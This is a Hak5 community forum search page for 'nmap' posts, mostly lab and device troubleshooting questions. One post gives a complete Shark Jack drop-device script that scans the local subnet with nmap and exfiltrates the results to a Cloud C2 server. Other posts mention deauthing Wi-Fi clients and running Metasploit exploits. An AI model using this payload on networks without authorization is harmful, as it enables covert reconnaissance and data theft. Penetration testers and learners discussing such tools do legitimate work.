Jump to content

Search the Community

Showing results for tags 'nmap'.

More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • WiFi Pineapple
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Gear
    • Hak5 Cloud C²
    • Plunder Bug
    • Bash Bunny
    • Signal Owl
    • USB Rubber Ducky
    • Packet Squirrel
    • LAN Turtle
    • Screen Crab
    • Shark Jack
  • Hak5 Shows
    • Hak5
    • HakTip
    • Metasploit Minute
    • Threatwire
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start





Website URL







Enter a five letter word.

Found 9 results

  1. I'm working through the Metasploitable 3 vulnerabilities. One of the frequent ones I see mentioned is Elasticsearch on port 9200. I can't get nmap to identify that port as Elasticsearch. Even when I do a -A -sV --version-all (and a bunch of other noisy scans) the best it can do is say it's the default wap-wsp port. So, I have 2 questions: Will Elasticsearch always be running on that port? Can anything be preventing nmap from identifying it on 9200? I'm running through virtualbox - I've heard it can drop some packets when looking at wireshark, but I haven't heard whether the VM can affect the scan results. (I've tried running the script_mvel_rce exploit blind... it copies the file but can't execute it).
  2. Hey y'all, just wanted to share my slightly modified nmap scan payload. It scans a bunch of ports, saves the output with a date stamp and multiple output types, and then uploads the loot to the C2 server. #!/bin/bash # # Title: Custom Nmap Payload for Shark Jack # Author: Flatlinebb # Version: 1.02 # # Scans target subnet with Nmap using specified options. Saves each scan result # to loot storage folder. Uploads loot to your C2 server # # Red ...........Setup # Amber..........Scanning # Green..........Finished # # See nmap --help for options. Default "-sP" ping scans the address space for # fast host discovery. NMAP_OPTIONS="-p 21,22,23,53,69,80,123,139,443,445,554,1812,3389,5220,2022,4242,4343,5000,5650,5655,5670,5800,5900,8080,8333,8222,8765,8008,8009,8181,8282,8383,8484,8888,8443,9000,10000,32400,32401,32402,49153 --open" LOOT_DIR=/root/loot/nmap SCAN_DIR=/etc/shark/nmap function finish() { LED CLEANUP # Kill Nmap echo $1 wait $1 kill $1 &> /dev/null # Exfiltrate all loot files FILES="$LOOT_DIR/*.*" for f in $FILES; do C2EXFIL STRING $f $SUBNET; done # Sync filesystem echo $SCAN_M > $SCAN_FILE sync sleep 1 LED FINISH sleep 1 # Halt system halt } function setup() { LED SETUP # Create loot directory mkdir -p $LOOT_DIR &> /dev/null # Set NETMODE to DHCP_CLIENT for Shark Jack v1.1.0+ NETMODE DHCP_CLIENT # Wait for an IP address to be obtained while ! ifconfig eth0 | grep "inet addr"; do sleep 1; done # Create tmp scan directory mkdir -p $SCAN_DIR &> /dev/null # Create tmp scan file if it doesn't exist SCAN_FILE=$SCAN_DIR/scan-count if [ ! -f $SCAN_FILE ]; then touch $SCAN_FILE && echo 0 > $SCAN_FILE fi # Find IP address and subnet while [ -z "$SUBNET" ]; do sleep 1 && find_subnet done } function find_subnet() { SUBNET=$(ip addr | grep -i eth0 | grep -i inet | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}[\/]{1}[0-9]{1,2}" | sed 's/\.[0-9]*\//\.0\//') } function run() { # Run setup setup SCAN_N=$(cat $SCAN_FILE) SCAN_M=$(( $SCAN_N + 1 )) LED ATTACK # Connect to Cloud C2 C2CONNECT # Wait until Cloud C2 connection is established while ! pgrep cc-client; do sleep 1; done # Start scan nmap $NMAP_OPTIONS $SUBNET -oA $LOOT_DIR/nmap-scan_$SCAN_M_`date +"%Y-%m-%d_%H%M%S"` &>/dev/null & tpid=$! sleep 1 finish $tpid } # Run payload run & Obligatory github link: https://github.com/flatlinebb/sharkjack-payloads/blob/master/payloads/library/recon/Custom nmap payload/payload.sh
  3. Module: nmap Version: 1.4 Features: Manage dependencies Configure nmap options Live output Run History Change log: 1.4 Bug fixes
  4. Hi. I have installed the nmap module, and its dependencies, but after that its shows nmap is not running... Can anyone help me?
  5. I installed the module and the dependencies. When I try to run it in the GUI nothing happens, and when I ry to run it from the command line I get "nmap: can't load library 'libpcap.so.1.3'." Is nmap broken or am I doing something wrong?
  6. Was wondering if it is possible to inject packets while the PS is in monitor mode? Or would this be pointless? if possible you could carry out an arp/nmap scan and it could be made to appear it’s coming from the host pc. Obviously I know one of the net modes allows the PS to present one IP on one interface and another IP on the other.
  7. Hello, I'am wondering if following setup would be possible 1x throwing star TAP 1x Packet squirrel Action: Connect both Ethernet cables for sniffing from throwing star to packet squirrel and capture network traffic for both interface to one pcap file Appreciate if anyone can confirm this :)
  8. Hello, Does anyone have used port scanners like nmap, or vulnerability scaners like nessus, openvas, etc. while providing internet via computer? I'm using the nano on Ubuntu 14.04 using wp6.sh. I've succesfully deauthed some clients (i'm still learning so it's not perfect) and bumped them to connect to the pineapple but when i try to use any scanner using the pineapple's ip, the results are as if i was scanning a host that's not connected. So, nmap shows "scanned X ips, 0 hosts where up", nessus and openvas finish the task with zero results and metasploit can't complete any exploits because the host is down. I know that the os gets the pineapple as another interface but i don't think that's the problem because other times i've succesfully scanned hosts while connected to three different networks (using ethernet, wifi with the integrated card and wifi with an external card). I don't know if its because of the way the wps6.sh script works, because tbh i dont know how it works, but that's the problem i'm facing right now. Anyone that can help me? if you need any other data, please ask. thanks.
  9. Hey guys - When I try to run the nmap scan, I'm not able to configure a log location. I select the "Log - Choose Log Location" from the turtle gui, but I don't go to another screen, it just flashes the same screen. I setup sshfs just fine so I don't clog up the internal storage on the device, so ideally I'd point the nmap to /sshfs. Any ideas? Known bug? Anyone else able to reproduce this? Thanks in advance telot
  • Create New...